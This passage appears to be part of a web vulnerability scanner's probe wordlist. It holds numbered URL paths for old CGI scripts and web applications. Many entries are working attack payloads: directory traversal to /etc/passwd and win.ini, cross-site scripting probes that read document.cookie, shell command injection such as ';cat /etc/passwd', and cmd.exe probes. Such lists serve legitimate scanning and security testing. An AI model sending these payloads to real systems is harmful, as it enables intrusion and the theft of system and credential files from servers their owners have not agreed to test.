  1235. cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
  1236. cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
  1237. cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
  1238. cgi-bin/search.pl
  1239. cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
  1240. cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
  1241. cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
  1242. cgi-bin/sendform.cgi
  1243. cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
  1244. cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
  1245. cgi-bin/sensepost.exe?/c+dir
  1246. cgi-bin/session/adminlogin
  1247. cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
  1248. cgi-bin/sh
  1249. cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
  1250. cgi-bin/shop.pl/page=;cat%20shop.pl|
  1251. cgi-bin/shop/auth_data/auth_user_file.txt
  1252. cgi-bin/shop/orders/orders.txt
  1253. cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
  1254. cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
  1255. cgi-bin/show.pl
  1256. cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
  1257. cgi-bin/showuser.cgi
  1258. cgi-bin/shtml.dll
  1259. cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
  1260. cgi-bin/simplestguest.cgi
  1261. cgi-bin/simplestmail.cgi
  1262. cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
  1263. cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
  1264. cgi-bin/snorkerz.bat
  1265. cgi-bin/snorkerz.cmd
  1266. cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
  1267. cgi-bin/spin_client.cgi?aaaaaaaa
  1268. cgi-bin/ss
  1269. cgi-bin/sscd_suncourier.pl
  1270. cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  1271. cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
  1272. cgi-bin/stat.pl
  1273. cgi-bin/stat/
  1274. cgi-bin/stats-bin-p/reports/index.html
  1275. cgi-bin/stats.pl
  1276. cgi-bin/stats.prf
  1277. cgi-bin/stats/
  1278. cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
  1279. cgi-bin/stats_old/
  1280. cgi-bin/statsconfig
  1281. cgi-bin/statusconfig.pl
  1282. cgi-bin/statview.pl
  1283. cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
  1284. cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
  1285. cgi-bin/store/agora.cgi?page=whatever33.html
  1286. cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
  1287. cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
  1288. cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
  1289. cgi-bin/survey
  1290. cgi-bin/survey.cgi
  1291. cgi-bin/sws/admin.html
  1292. cgi-bin/sws/manager.pl
  1293. cgi-bin/tablebuild.pl
  1294. cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
  1295. cgi-bin/tcsh
  1296. cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
  1297. cgi-bin/test-cgi
  1298. cgi-bin/test-cgi.bat
  1299. cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
  1300. cgi-bin/test-cgi.tcl
  1301. cgi-bin/test-cgi?/*
  1302. cgi-bin/test-env
  1303. cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
  1304. cgi-bin/test.cgi
  1305. cgi-bin/test/test.cgi
  1306. cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
  1307. cgi-bin/testcgi.exe
  1308. cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
  1309. cgi-bin/testing_whatever
  1310. cgi-bin/texis.exe/junk
  1311. cgi-bin/texis/junk
  1312. cgi-bin/texis/phine
  1313. cgi-bin/textcounter.pl
  1314. cgi-bin/tidfinder.cgi
  1315. cgi-bin/tigvote.cgi
  1316. cgi-bin/title.cgi
  1317. cgi-bin/tpgnrock
  1318. cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
  1319. cgi-bin/troops.cgi
  1320. cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
  1321. cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
  1322. cgi-bin/ultraboard.cgi
  1323. cgi-bin/ultraboard.pl
  1324. cgi-bin/unlg1.1
  1325. cgi-bin/unlg1.2
  1326. cgi-bin/update.dpgs
  1327. cgi-bin/upload.cgi
  1328. cgi-bin/uptime
  1329. cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
  1330. cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
  1331. cgi-bin/utm/admin
  1332. cgi-bin/utm/utm_stat
  1333. cgi-bin/view-source
  1334. cgi-bin/view-source?view-source
  1335. cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
  1336. cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
  1337. cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
  1338. cgi-bin/viewlogs.pl
  1339. cgi-bin/viewsource?/etc/passwd
  1340. cgi-bin/viralator.cgi
  1341. cgi-bin/virgil.cgi
  1342. cgi-bin/visadmin.exe
  1343. cgi-bin/visitor.exe
  1344. cgi-bin/vote.cgi
  1345. cgi-bin/vpasswd.cgi
  1346. cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
  1347. cgi-bin/w3-msql
  1348. cgi-bin/w3-sql
  1349. cgi-bin/wais.pl
  1350. cgi-bin/way-board.cgi?db=/etc/passwd%00
  1351. cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
  1352. cgi-bin/wconsole.dll
  1353. cgi-bin/webais
  1354. cgi-bin/webbbs.cgi
  1355. cgi-bin/webbbs.exe
  1356. cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
  1357. cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
  1358. cgi-bin/webdist.cgi
  1359. cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
  1360. cgi-bin/webdriver
  1361. cgi-bin/webfind.exe?keywords=01234567890123456789
  1362. cgi-bin/webgais
  1363. cgi-bin/webif.cgi
  1364. cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  1365. cgi-bin/webmap.cgi
  1366. cgi-bin/webnews.pl
  1367. cgi-bin/webplus.exe?about
  1368. cgi-bin/webplus?about
  1369. cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
  1370. cgi-bin/websendmail
  1371. cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
  1372. cgi-bin/webutil.pl
  1373. cgi-bin/webutils.pl
  1374. cgi-bin/webwho.pl
  1375. cgi-bin/wguest.exe
  1376. cgi-bin/where.pl?sd=ls%20/etc
  1377. cgi-bin/whois.cgi?action=load&whois=%3Bid
  1378. cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
  1379. cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
  1380. cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
  1381. cgi-bin/windmail
  1382. cgi-bin/windmail.exe
  1383. cgi-bin/wrap
  1384. cgi-bin/ws_ftp.ini
  1385. cgi-bin/www-sql
  1386. cgi-bin/wwwadmin.pl
  1387. cgi-bin/wwwboard.cgi.cgi
  1388. cgi-bin/wwwboard.pl
  1389. cgi-bin/wwwstats.pl
  1390. cgi-bin/wwwthreads/3tvars.pm
  1391. cgi-bin/wwwthreads/w3tvars.pm
  1392. cgi-bin/wwwwais
  1393. cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
  1394. cgi-bin/zsh
  1395. cgi-dos/args.bat
  1396. cgi-lib.pl
  1397. cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
  1398. cgi-local/cgiemail-1.4/cgicso?query=AAA
  1399. cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
  1400. cgi-local/cgiemail-1.6/cgicso?query=AAA
  1401. cgi-shl/win-c-sample.exe
  1402. cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
  1403. cgi-sys/FormMail-clone.cgi
  1404. cgi-sys/addalink.cgi
  1405. cgi-sys/cgiecho
  1406. cgi-sys/cgiemail
  1407. cgi-sys/countedit
  1408. cgi-sys/domainredirect.cgi
  1409. cgi-sys/entropybanner.cgi
  1410. cgi-sys/entropysearch.cgi
  1411. cgi-sys/helpdesk.cgi
  1412. cgi-sys/mchat.cgi
  1413. cgi-sys/randhtml.cgi
  1414. cgi-sys/realhelpdesk.cgi
  1415. cgi-sys/realsignup.cgi
  1416. cgi-sys/scgiwrap
  1417. cgi-sys/signup.cgi
  1418. cgi-win/cgitest.exe
  1419. cgi-win/uploader.exe
  1420. cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
  1421. cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
  1422. cgi/cgiproc?
  1423. cgicso?query=<script>alert('Vulnerable')</script>
  1424. cgicso?query=<script>alert('XSS')</script>
  1425. cgicso?query=AAA
  1426. cgiforum.pl?thesection=../../../../../../../../../../etc
  1427. cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
  1428. cgimail.exe
  1429. cgis/wwwboard/wwwboard.cgi
  1430. cgis/wwwboard/wwwboard.pl
  1431. cgitest.exe
  1432. cgiwrap
  1433. cgiwrap/%3Cfont%20color=red%3E
  1434. cgiwrap/~@U
  1435. cgiwrap/~@USERS
  1436. cgiwrap/~JUNK(5)
  1437. cgiwrap/~root
  1438. change-your-password.pl
  1439. chassis/config/GeneralChassisConfig.html
  1440. chat/!nicks.txt
  1441. chat/!pwds.txt
  1442. chat/data/usr
  1443. chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
  1444. chat_dir/register.php
  1445. chatlog.nsf
  1446. checkout_payment.php
  1447. class/mysql.class
  1448. classified.cgi
  1449. classifieds
  1450. classifieds.cgi
  1451. classifieds/classifieds.cgi
  1452. classifieds/index.cgi
  1453. clbusy.nsf
  1454. cldbdir.nsf
  1455. cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
  1456. cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
  1457. clickcount.pl?view=test
  1458. clickresponder.pl
  1459. client/
  1460. cliente/
  1461. clientes/
  1462. clients/
  1463. clocktower/
  1464. clusta4.nsf
  1465. clusterframe.jsp
  1466. clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
  1467. cm/
  1468. cmd.exe?/c+dir
  1469. cmd1.exe?/c+dir
  1470. code.php
  1471. code.php3
  1472. code/
  1473. collect4.nsf
  1474. com
  1475. com/
  1476. com/novell/
  1477. com/novell/gwmonitor/help/en/default.htm
  1478. com/novell/webaccess
  1479. com/novell/webaccess/help/en/default.htm
  1480. com/novell/webpublisher/help/en/default.htm
  1481. com5.........................…